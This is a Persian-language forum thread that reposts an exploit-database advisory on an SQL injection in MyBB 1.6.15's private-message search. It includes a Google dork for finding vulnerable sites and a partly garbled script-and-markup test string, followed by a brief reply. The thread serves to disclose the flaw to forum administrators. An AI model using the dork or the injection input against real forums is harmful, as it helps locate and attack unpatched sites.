هاست لینوکس

آخرین بسته‌ی MyBB: نسخه‌ی 1.8.27 MyBB منتشر شد


امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
مشکل امنیتی جدید MyBB 1.6.15
#1
Thumbs Up 
با سلام و درود.
یه مشکل امنیتی جدید منتشر شده در mybb 1.6.15 که در قسمت پیغام خصوصی هستش.
کد php:
###########################

# MyBB 1.6.15 - SQL Injection vulnerability

###########################

# Title: MyBB 1.6.15 - SQL Injection
# Google Dork: intext:"Powered By MyBB"
# Date: 15.08.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.6.15
# Contact: onur@b3yaz.org
# Video: http://www.youtube.com/watch?v=_29v1YEZE2s

***************************************************

[~
#~] SQL Injection in Private Messages ( User CP )

Go to -> Inbox, for example:
localhost/private.php

Search at the following code Keywords
:
<
foo> <h1> <scriptalert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

***************************************************

[~
#~] Thanks To:
MugairX-X-XPoseidonKairosDexmoDMickyBIGERAN and all TurkeySecurity Elit-Hack.Org Members.

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2014-08-17]

########################### 
لینکش :

http://www.iedb.ir/exploits-1855.html

تست کردم دیدم توی ورژن های قبلی هم این ارور رو میده.
داخل بعضی از جاها فقط ارور هستش.اما میشه سوء استفاده های دیگه هم کرد.و هیچ محدودیتی واسه این قسمت نیست و ورودی اصلا چک نمیشه.
این فقط برای اطلاع رسانی هستش.
موفق باشید.
پاسخ
 سپاس شده توسطfirstboy000 (۱۳۹۳/۶/۲، ۱۱:۴۶:۳۱ صبح) ، R. Najafi (۱۳۹۳/۶/۲، ۱۶:۰۰:۵۲ عصر) ، محمد تی ام (۱۳۹۳/۶/۲، ۱۶:۴۸:۱۰ عصر) ، a.armaney (۱۳۹۳/۶/۳، ۱۴:۳۱:۲۰ عصر)
#2
این مشکلات امنیتی مای بی بی هم تمومی ندارهUndecided


امیدواریم در نسخه 1.8 شاهد مشکلات امنیتی نباشیم
پاسخ
 سپاس شده توسطAm!r (۱۳۹۳/۶/۲، ۱۷:۲۹:۱۲ عصر) ، شماره مجازی (۱۴۰۱/۸/۲۶، ۰۱:۵۴:۱۹ صبح) ، گراف مسنجر (۱۴۰۱/۱۰/۳، ۰۴:۱۶:۰۹ صبح) ، چارتر ۴۲۴ (۱۴۰۲/۹/۱۲، ۱۵:۱۸:۰۳ عصر)


پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان